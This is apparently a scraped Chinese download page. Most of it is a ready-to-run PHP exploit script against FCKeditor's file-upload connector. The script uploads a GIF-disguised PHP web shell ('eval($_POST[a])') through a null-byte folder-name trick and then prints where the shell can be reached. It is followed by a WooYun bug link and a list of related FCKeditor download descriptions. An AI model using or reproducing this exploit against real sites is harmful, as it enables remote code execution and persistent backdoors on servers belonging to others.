<?
error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80);while (!$sock){print "\n[-] No response from {$host}:80 Trying
again...";$sock = fsockopen($host, 80);}fputs($sock, $packet);while (!feof($sock)) $resp .= fread($sock, 1024);fclose($sock);print $resp;return $resp;}function connector_response($html){global $match;return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/",
$html, $match) && in_array($match[1], array(0, 201)));}print "\n+------------------------------------------------------------------+";print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";print "\n+------------------------------------------------------------------+\n";if
($argc < 3){print "\nUsage......: php $argv[0] host path\n";print "\nExample....: php $argv[0] localhost /\n";print "\nExample....: php $argv[0] localhost /FCKEditor/\n";die();}$host = $argv[1];$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename = "fvck.gif";$foldername
= "fuck.php%00.gif";$connector = "editor/filemanager/connectors/php/connector.php";$payload = "-----------------------------265001916915724\r\n";$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";$payload .= "Content-Type:
image/jpeg\r\n\r\n";$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";$payload .= "-----------------------------265001916915724--\r\n";$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print
$packet;$packet .= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";$packet .= "Content-Length: ".strlen($payload)."\r\n";$packet .= "Connection: close\r\n\r\n";$packet .= $payload;print
$packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");else print "\n[-] Job done! try http://${host}/$match[2] \n";?>http://www.wooyun.org/bugs/wooyun-2010-01684
分享到:
相关推荐
FCKeditor_2.6.6 + FCKeditor.Net_2.6.4 ,ASP.NET下用的文本编辑器。
FCKeditor.Net_2.6.4 .NET 开发源码
比起ckeditor编辑器,还是觉得这个好用,可直接复制到自己的项目上去使用,使用文档里有使用指南!
fckeditor 2.6.4 完整版 fckeditor 2.6.4 完整版 编辑器
FCKeditor.NET 是 FCKeditor 编辑器和.NET开发语言之间的集成包,通过FCKeditor.NET可以在 .NET 程序中处理FCKeditor编辑器中的文件上传、浏览等需要服务器端支持的功能
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
FCKeditor_2.6.4 for Bo-Blog 完美版
解决fckeditor 上传漏洞,类似asp;.jpg asp.jpg
FCKeditor2.6.4使用说明 使用FCKeditor的人可以下来看看噢~
由官网FCKeditor_2.6.4+fckeditor-java-2.4.1修改。 修改内容有: 1、上传的文件名为中文会变成乱码 2、新建中文目录变乱码(这个好似还有点小问题,不过不影响使用,还是不建议用中文目录) 3、对上传的文件使用...
FCKeditor 这个开源的HTML 文本编辑器可以让web 程序拥有如MS Word 这样强大的编辑功能,.FCKeditor 支持当前流行的浏览器。
FCKeditor_2.6.4 and FCKeditor.Net_2.6.3 支持asp.net的文本编辑器,包含编辑器文件和。net支持控件
最新版fckeditor V2.6.4的配置,其中增加了几种常用的字体、文字大小和比较流行的QQ表情,并且配置了上传文件的类型,同时增加了类似word的行距功能,另外所有的设置都是通过自己定义的myfckconfig.js文件来进行配置...
FCKeditor_2.6.4.tar.gz
FCKeditor_2.6.4 在线编辑器最终版,完整功能
FCKeditor_2.6.4(在线编辑器),经过测试,非常好用
最流行在线编辑器,知道的下 最流行在线编辑器,知道的下 最流行在线编辑器,知道的下
NULL 博文链接:https://kaig.iteye.com/blog/363825
在线文本编辑器FCKeditor在JSP项目开发